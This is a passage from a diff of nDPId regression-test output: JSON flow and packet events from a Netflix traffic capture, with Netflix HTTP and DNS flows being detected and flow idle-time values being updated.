Scale\/2.00)"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1484319043013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043013,"pkt":"gCqoTGHM5JjWH70UCABFAABAkrpAAEAGYhvAqAEHuBnMGc+dAFDU44WRAAAAALAC\/\/\/IugAAAgQFtAEDAwUBAQgKH2TemAAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz5xwDCo3tiBZg6AScSDeBAAAAgQFtAQCCAr\/\/DsdH2TelwEDAwU="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"} 
+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1484319048757,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1484319048757,"pkt":"gCqoTGHM5JjWH70UCABFAABBS2MAAP8R7O\/AqAEHwKgBAeL2ADUALZ5c\/mQBAAABAAAAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAQ=="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1484319048776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1484319048776,"pkt":"5JjWH70UgCqoTGHMCABFAACy4UZAAEAR1ZvAqAEBwKgBBwA14vYAnkKZ\/mSBgAABAAUAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAcAMAAUAAQAAAG0ADgdhcHBib290A2dlb8AUwDEABQABAAABawAbB2FwcGJvb3QJdXMtd2VzdC0yBnByb2RhYcAUwEsAAQABAAAACwAENsm\/hMBLAAEAAQAAAAsABDQr9VrASwABAAEAAAALAAQ0GfQx"} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"} 
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"} 
+00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 